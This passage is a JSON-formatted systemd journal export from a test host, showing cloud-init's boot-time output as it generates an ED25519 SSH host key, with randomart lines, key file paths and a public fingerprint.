"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b6;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=ff7cff72ff6643ba", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| =o+|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b7;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=8accf5e248f6a562", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| .o |" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b8;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=b5ce2a231b940b45", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| E .. + |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b9;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=add86eb92dc43132", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| +....+.o o +|" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ba;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2ef7cc08ed3fac95", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| + =o o.+ * *+|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2bb;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=4aa22db2063ddc55", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| O . . 
= * B|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2bc;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=28e3fbd75f74d823", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| o o. .o.=.o.|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2bd;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=bd50657e96b79a01", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+----[SHA256]-----+" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2be;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=d7c073cdcdbf46d6", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Generating public/private ed25519 key pair." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2bf;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=8539d8794592c42b", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your identification has been saved in /etc/ssh/ssh_host_ed25519_key." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c0;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=a04169e245d150cc", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your public key has been saved in /etc/ssh/ssh_host_ed25519_key.pub." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c1;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2faa7d692a908da5", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key fingerprint is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c2;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=345a32106e197585", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "SHA256:LGSFwDAA7B9jve87IoPLkG3UGaAwTRLkJQeTPTX2mWw root@test-1" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c3;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=547039c05140533d", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key's randomart image is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c4;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=d5b5481a3afeba41", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+--[ED25519 256]--+" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c5;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=3e5a8ac5210aedd6", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|@XO=o= .. |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c6;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=f5fbc907c61aa5b1", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o**=o =.o |" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c7;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=b7315a6e7d8d6822", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o. + oE |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c8;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=198e39844a6fea32", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| . = *.. 
|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c9;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=c32fc07777cefd49", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| + = o S |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ca;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=8336df269661001a", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| + . . . 
|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2cb;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=1ca725f94f5f57a0", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o + . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2cc;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=60dd92c320805416", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|oo o . 
o |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2cd;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=92ed6654ceb9e458", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : 